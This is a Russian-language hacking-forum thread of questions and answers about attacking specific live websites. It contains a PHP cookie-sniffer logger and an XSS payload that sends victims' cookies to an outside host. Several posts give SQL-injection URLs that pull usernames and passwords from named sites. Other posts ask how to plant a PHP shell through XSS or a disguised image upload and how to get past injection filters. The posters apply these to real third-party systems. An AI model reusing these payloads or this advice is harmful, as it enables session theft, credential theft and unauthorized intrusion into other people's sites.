Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    снифер чего?
     
    _________________________
  2. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    нужно узнать ip украсть cookie,нашёл какой-то http://kanick.ru/sniffer/
    Но к автору не могу достучаться.
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    загрузки на свой сервак, и перенаправь жертву

    PHP:
    <?php $f fopen('log.txt','a'); fwrite($f,$_SERVER['QUERY_STRING'].':'.$_SERVER['REMOTE_ADDR']."\r\n");fclose($f); ?>
     
    _________________________
    #22163 Konqi, 9 May 2013
    Last edited: 9 May 2013
  4. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Konqi а если нужно узнать ip браузер и т.д?
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    написал же выше, ip тоже пишется, а браузер - $_SERVER['HTTP_USER_AGENT']

    вся инфа держится в суперглобальном массиве $_SERVER

    курите php
     
    _________________________
    1 person likes this.
  6. foma2120

    foma2120 New Member

    Joined:
    5 Feb 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Вот deluxe версия его сниффера http://kanick.ru/sniffer/deluxe.rar
     
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    ребят, как получитть шелл с рут доступом, если имеется доступ в phpmyadmin с root аккаунта?
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    это разные руты. читаем книги MySQL, Linux
     
    _________________________
    1 person likes this.
  9. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    http://www.skintologyny.com/admin/login.php
    http://www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13+from+users%23
    почему не могу войти?
     
  10. foma2120

    foma2120 New Member

    Joined:
    5 Feb 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Там много страниц авторизации
    http://www.skintologyny.com/blog/wp-login.php
    http://www.skintologyny.com/admin/login.php/admin/verifylogin.php
     
  11. boolOS

    boolOS New Member

    Joined:
    18 Apr 2013
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    помогите плз допилить.
    Code:
    http://wylsacom.planetiphone.ru/blog.php?page=-1 or 1=1 and (select 1 and row(1,1)>(select version(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
    но нехочет выводить ничего(
     
  12. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Решил впервые заняться xss,попался форум vbulletin, на котором есть логин и пароль модератора,зашёл в modcp добавил обьявление в заголовке и в описании "><script>alert('XSS')</script> всё выполняеться успешно пробую подставить снифер
    <script>
    img = new Image();
    img.src = "http://lada-priora.ru/forum/images/deluxe/s.gif?"+document.cookie;
    </script>

    Но на снифер приходит только это QUERY: r4870=1; bblastvisit=1368254092; bblastactivity=0 , ip и agent

    Подскажите что не правильно делаю?
     
  13. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    На vB при некоторых настройках куки привязаны к ip и разумеется всегда httpOnly.

    Если удалось получить XSS, нужно её сразу использовать для совершения необходимых действий или найти возможность получения куков другим способом, записать юзер-агент и заходить под IP из той-же подсети.

    Вы определитесь, что вам собственно нужно сделать и для чего.
     
  14. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    XAMEHA проверял на виртуалке,ip одинаковый,использовал сразу.Хз мож снифер другой попробовать?
     
  15. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Вопрос по XSS

    Имеется site1.com.
    Так же есть XSS вида <script>alert()</script> (т.е нет фильтрации символов) на site2.com

    site1.com грузит через iframe site2.com.
    Можно ли получить куки пользователя сайта site1.com используя XSS site2.com ??
    Спасибо :)
     
  16. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    нет нельзя. политика безопасности современных браузеров жестока)


    А у меня такой вопрос... как происходит восстановление пароля на drupal 6? Если послать запрос на ретрив - пишется куда-нибудь токен?
    На сайте рега модерируемая, не глянуть, а двиг скачать пока не позволяет инет лагающий :(
    подскажите?
     
  17. rogatiy

    rogatiy New Member

    Joined:
    3 Mar 2013
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    Можно ли как-нибудь обойти подстановку дефисов в '<?php'? Нашёл XSS, пытаюсь через неё загнать PHP код, как бы странно это не казалось.
    В поле с XSS пишу такое:
    Code:
    </div></html><?php
    //код шелла;
    ?>
    В итоге в конце страницы появляется
    Code:
    <!--?php
    //код шелла;
    ?-->
    Код, соотв., не выполняется. Это возможно обойти?
    Ну и ещё один вопрос - можно ли как-то выяснить оригинальный путь сохранения изображений? Заливаешь, к примеру, abc.php.jpg, а отображается какой-нибудь 1651656541854541.jpg
     
  18. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    _http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
    Как раскрутить? Фильтрует union и select.
     
    #22178 Vip77, 12 May 2013
    Last edited: 12 May 2013
  19. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    В первую очередь, обратил бы ты внимание на то, что фильтрация SLECT & UNION - это вторичное. А первичное - это то, что фильтруется также кавычка, собвственно деформирующая запрос. И пока ты не найдешь способ обойти сей момент, можешь не волноваться по поводу фильтрации всего остального.
     
  20. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Cennarios немного ошибся, фильтруется +
    [​IMG]

    В общем сам добил
    username
    [​IMG]


    password
    [​IMG]

    Пробелы убрать не забудь
     
    #22180 OxoTnik, 13 May 2013
    Last edited: 13 May 2013
    1 person likes this.
Thread Status:
Not open for further replies.